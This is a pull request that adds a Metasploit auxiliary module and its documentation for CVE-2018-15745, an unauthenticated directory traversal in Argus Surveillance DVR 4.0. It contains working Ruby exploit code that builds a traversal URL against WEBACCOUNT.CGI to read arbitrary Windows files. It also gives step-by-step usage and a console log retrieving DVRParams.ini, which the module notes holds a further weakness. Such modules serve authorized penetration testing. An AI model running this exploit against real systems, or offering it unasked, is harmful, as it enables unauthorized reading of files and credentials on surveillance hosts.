### PR TITLE
Argus LFI Auxiliary Module with Associated Doc (CVE-2018-15745)

### DIFF
--- a/documentation/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.md
+++ b/documentation/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.md
@@ -1,0 +1,46 @@
+## Vulnerable Application
+This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 
+
+## Options
+To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
+As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.
+
+## Testing
+To setup a test environment, the following steps can be performed:
+1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
+2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
+3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
+4. On your attacker machine follow the verification steps below.
+
+## Verification Steps
+1. start msfconsole
+2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set TARGET_FILE Windows/system.ini`
+5. `run`
+
+## Scenarios
+### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
+```
+msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
+RHOSTS => 192.168.1.15
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
+[*] Running module against 192.168.1.15
+[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
+[+] File retrieved successfully!
+[Main]
+ServerName=
+ServerLocation=
+ServerDescription=
+ReadH=0
+UseDialUp=0
+DialUpConName=
+DialUpDisconnectWhenDone=0
+DIALUPUSEDEFAULTS" checked checked
+
+[*] Auxiliary module execution completed
+
+```

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -4,73 +4,72 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-    include Msf::Exploit::Remote::HttpClient
-    include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
 
-def initialize(info = {})
+  def initialize(info = {})
     super(
-        update_info(
-            info,
-            'Name' => 'Argus Surveillance DVR 4.0.0.0 - Directory Traversal',
-            'Description' => %q{
-                This module leverages an unauthenticated arbitrary file read for
-                the Argus Surveillance 4.0.0.0 system which never saw an update since.
-                As this is a Windows related application we recommend looking for common
-                Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
-                which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln
-                is being tracked as CVE-2018-15745
-            },
-            'Author' => [ 
-              'Maxwell Francis', # msf module
-              'John Page' # (aka hyp3rlinx) PoC 
-             ],
-            'Notes' => {
-                'Stability' => [CRASH_SAFE],
-                'SideEffects' => [],
-                'Reliability' => []
-            },
-            'DefaultOptions' => { 
-              'SSL' => false,
-              'RPORT' => 8080
-            },
-            'References' => [
-            # Vendor Download
-            [ 'URL', 'https://argus-surveillance-dvr.soft112.com/#google_vignette'],
-            # Exploit DB Listing
-            [ 'URL', 'https://www.exploit-db.com/exploits/45296'],
-            # CVE Number
-            ['CVE', '2018-15745'] 
-            ]
-
-        )
+      update_info(
+        info,
+        'Name' => 'Argus Surveillance DVR 4.0.0.0 - Directory Traversal',
+        'Description' => %q{
+          This module leverages an unauthenticated arbitrary file read for
+          the Argus Surveillance 4.0.0.0 system which never saw an update since.
+          As this is a Windows related application we recommend looking for common
+          Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
+          which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln
+          is being tracked as CVE-2018-15745
+        },
+        'Author' => [
+          'Maxwell Francis', # msf module
+          'John Page' # (aka hyp3rlinx) PoC
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 8080
+        },
+        'References' => [
+          # Vendor Download
+          [ 'URL', 'https://argus-surveillance-dvr.soft112.com/#google_vignette'],
+          # Exploit DB Listing
+          [ 'URL', 'https://www.exploit-db.com/exploits/45296'],
+          # CVE Number
+          ['CVE', '2018-15745']
+        ]
+      )
     )
 
     register_options(
-        [
-          OptString.new('TARGET_FILE', [true, 'The file to retrieve', 'Windows/system.ini'])
-        ]
-      )
+      [
+        OptString.new('TARGET_FILE', [true, 'The file to retrieve', 'Windows/system.ini'])
+      ]
+    )
+  end
+
+  def run
+    traversal_path = '..%2F' * 16
+    target_file = datastore['TARGET_FILE'].gsub(' ', '%20')
+    url_path = "/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=#{traversal_path}#{target_file}&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
+
+    print_status("Sending request to #{rhost}:#{rport} for file: #{target_file}")
+
+    response = send_request_cgi({
+      'method' => 'GET',
+      'uri' => url_path
+    })
+
+    if response&.code == 200 && !response.body.include?('Cannot find this file.')
+      print_good('File retrieved successfully!')
+      print_line(response.body)
+      store_loot('file_traversal', 'text/plain', rhost, response.body, "#{target_file.gsub('/', '_')}.txt")
+    else
+      print_error('Failed to retrieve file.') if response # Response from server but file not returned
+      print_error('No response from target.') unless response # No response from server
     end
-
-    def run
-        traversal_path = "..%2F" * 16
-        target_file = datastore['TARGET_FILE'].gsub(' ', '%20')
-        url_path ="/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=#{traversal_path}#{target_file}&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
-
-        print_status("Sending request to #{rhost}:#{rport} for file: #{target_file}")
-
-        response = send_request_cgi({
-            'method' => 'GET',
-            'uri' => url_path
-        })
-
-        if response&.code == 200 && !response.body.include?("Cannot find this file.")
-            print_good('File retrieved successfully!')
-            print_line(response.body)
-            store_loot("file_traversal", "text/plain", rhost, response.body, "#{target_file.gsub('/', '_')}.txt")
-        else
-            print_error("Failed to retrieve file.") if response
-            print_error("No response from target.") unless response
-        end
-    end
+  end
 end

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -60,7 +60,7 @@ def initialize(info = {})
             'uri' => url_path
         })
 
-        if response && response.code == 200 && !response.body.include?("Cannot find this file.")
+        if response&.code == 200 && !response.body.include?("Cannot find this file.")
             print_good('File retrieved successfully!')
             print_line(response.body)
             store_loot("file_traversal", "text/plain", rhost, response.body, "#{target_file.gsub('/', '_')}.txt")

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -29,7 +29,10 @@ def initialize(info = {})
                 'SideEffects' => [],
                 'Reliability' => []
             },
-            'DefaultOptions' => { 'SSL' => false },
+            'DefaultOptions' => { 
+              'SSL' => false,
+              'RPORT' => 8080
+            },
             'References' => [
             # Vendor Download
             [ 'URL', 'https://argus-surveillance-dvr.soft112.com/#google_vignette'],

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -20,7 +20,10 @@ def initialize(info = {})
                 which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln
                 is being tracked as CVE-2018-15745
             },
-            'Author' => [ 'Maxwell Francis' ],
+            'Author' => [ 
+              'Maxwell Francis', # msf module
+              'John Page' # (aka hyp3rlinx) PoC 
+             ],
             'Notes' => {
                 'Stability' => [CRASH_SAFE],
                 'SideEffects' => [],

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Auxiliary
           # Vendor Download
           [ 'URL', 'https://argus-surveillance-dvr.soft112.com/#google_vignette'],
           # Exploit DB Listing
-          [ 'URL', 'https://www.exploit-db.com/exploits/45296'],
+          [ 'EDB', '45296'],
           # CVE Number
           ['CVE', '2018-15745']
         ]

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Auxiliary::Report
+
+def initialize(info = {})
+    super(
+        update_info(
+            info,
+            'Name' => 'Argus Surveillance DVR 4.0.0.0 - Directory Traversal',
+            'Description' => %q{
+                This module leverages an anauthenticated arbitrary file read for
+                the Argus Surveillance 4.0.0.0 system which never saw an update since.
+                As this is a Windows related application we recommend looking for common
+                Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
+                which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln
+                is being tracked as CVE-2018-15745
+            },
+            'Author' => [ 'Maxwell Francis' ],
+            'Notes' => {
+                'Stability' => [CRASH_SAFE],
+                'SideEffects' => [],
+                'Reliability' => []
+            },
+            'DefaultOptions' => { 'SSL' => false },
+            'References' => [
+            # Vendor Download
+            [ 'URL', 'https://argus-surveillance-dvr.soft112.com/#google_vignette'],
+            # Exploit DB Listing
+            [ 'URL', 'https://www.exploit-db.com/exploits/45296'],
+            # CVE Number
+            ['CVE', '2018-15745'] 
+            ]
+
+        )
+    )
+
+    register_options(
+        [
+          Opt::RHOST(),
+          Opt::RPORT(8080),
+          OptString.new('TARGET_FILE', [true, 'The file to retrieve', 'Windows/system.ini'])
+        ]
+      )
+    end
+
+    def run
+        traversal_path = "..%2F" * 16
+        target_file = datastore['TARGET_FILE'].gsub(' ', '%20')
+        url_path ="/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=#{traversal_path}#{target_file}&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
+
+        print_status("Sending request to #{rhost}:#{rport} for file: #{target_file}")
+
+        response = send_request_cgi({
+            'method' => 'GET',
+            'uri' => url_path
+        })
+
+        if response && response.code == 200 && !response.body.include?("Cannot find this file.")
+            print_good('File retrieved successfully!')
+            print_line(response.body)
+            store_loot("file_traversal", "text/plain", rhost, response.body, "#{target_file.gsub('/', '_')}.txt")
+        else
+            print_error("Failed to retrieve file.") if response
+            print_error("No response from target.") unless response
+        end
+    end
+end

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -45,7 +45,6 @@ def initialize(info = {})
     register_options(
         [
           Opt::RHOST(),
-          Opt::RPORT(8080),
           OptString.new('TARGET_FILE', [true, 'The file to retrieve', 'Windows/system.ini'])
         ]
       )

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -44,7 +44,6 @@ def initialize(info = {})
 
     register_options(
         [
-          Opt::RHOST(),
           OptString.new('TARGET_FILE', [true, 'The file to retrieve', 'Windows/system.ini'])
         ]
       )

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -13,7 +13,7 @@ def initialize(info = {})
             info,
             'Name' => 'Argus Surveillance DVR 4.0.0.0 - Directory Traversal',
             'Description' => %q{
-                This module leverages an anauthenticated arbitrary file read for
+                This module leverages an unauthenticated arbitrary file read for
                 the Argus Surveillance 4.0.0.0 system which never saw an update since.
                 As this is a Windows related application we recommend looking for common
                 Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -67,9 +67,10 @@ class MetasploitModule < Msf::Auxiliary
       print_good('File retrieved successfully!')
       print_line(response.body)
       store_loot('file_traversal', 'text/plain', rhost, response.body, "#{target_file.gsub('/', '_')}.txt")
+    elsif response
+      print_error('Failed to retrieve file.') # Response from server but file not returned
     else
-      print_error('Failed to retrieve file.') if response # Response from server but file not returned
-      print_error('No response from target.') unless response # No response from server
+      print_error('No response from target.') # No response from server
     end
   end
 end


### PR DESCRIPTION
This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 

## Options
To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.

## Testing
To setup a test environment, the following steps can be performed:
1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
4. On your attacker machine follow the verification steps below.

## Verification Steps
1. start msfconsole
2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
3. `set RHOSTS <TARGET_IP_ADDRESS>`
4. `set TARGET_FILE Windows/system.ini`
5. `run`

## Scenarios
### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
```
msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
[*] Running module against 192.168.1.15
[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
[+] File retrieved successfully!
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DIALUPUSEDEFAULTS" checked checked

[*] Auxiliary module execution completed

```